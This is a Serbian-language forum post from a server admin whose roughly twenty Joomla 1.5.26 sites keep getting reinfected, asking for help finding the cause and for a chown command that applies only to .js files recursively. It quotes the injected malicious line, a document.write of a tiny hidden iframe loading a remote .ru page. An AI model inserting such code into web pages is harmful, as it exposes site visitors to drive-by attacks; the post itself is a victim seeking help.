imam VPS sa oko 20 Joomla sajtova, svi su 1.5.26. Od pre dva dana su svi sajtovi zarazeni. Generalno, svi .js fajlovi imaju iframe na kraju. Link koji sadrzi iframe se menja otprilike na svakih sat vremena. Preko shell-a sam izlistao sve fajlove koji su modifikovani u poslednja dva dana, medjutim nikako da nadjem neki .php ili .html ili bilo sta drugo sto bi bilo cudno, osim .js fajlova. Odradio sam restore jednog od sajtova i posle dva minuta, bio je ponovo zarazen. Koristio sam JCE, medjutim deinstalirao sam ga, posto se nalazi na vulnerability listi, jelte. U sustini sajtovi nemaju vise nisto drugo zajednicko, tj. neku ekstenziju koju svi koriste.
ubaceni iframe izgleda ovako:
document.write('<iframe src="http://nekiruskisajt.ru/imefajla.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');
Imate li mozda neku ideju? Hvala unapred.
A ima li mozda neko iskustva Shell-u?
Za prvu pomoc hteo bih da za sve .js fajlove promenim owner i group na nesto:nesto sa apache:apache da ih malware ne moze vise editovati, cisto dok ne nadjem uzrok.chown -hR owner:group /folder - komanda bi promenila sve u /folder i nize ukljucujuci fajlove i ostale foldere, a meni treba da menja samo *.js fajlove
Kada stavim chown -hR owner:group /folder/*.js, on promeni fajlove koje su u tom folderu, ali tu se potom i zaustavi i ne ide nize.
